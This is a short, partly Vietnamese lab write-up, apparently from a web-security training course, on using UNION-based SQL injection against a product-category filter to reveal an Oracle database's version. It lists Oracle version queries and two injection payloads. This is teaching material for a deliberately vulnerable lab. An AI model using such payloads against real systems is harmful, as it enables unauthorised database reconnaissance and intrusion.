Lab: SQL injection attack, querying the database type and version on Oracle
PreviousExamining the databaseNextLab: SQL injection attack, querying the database type and version on MySQL and Microsoft
Last updated
Last updated
Phòng thí nghiệm này chứa lỗ hổng trong bộ lọc danh mục sản phẩm. Bạn có thể sử dụng tấn công UNION để lấy kết quả từ truy vấn được tiêm.
Mục tiêu: Hiển thị chuỗi phiên bản cơ sở dữ liệu
Oracle
SELECT banner FROM v$version
SELECT version FROM v$instance
' UNION SELECT NULL,NULL FROM v$version--
' UNION SELECT banner FROM v$version--
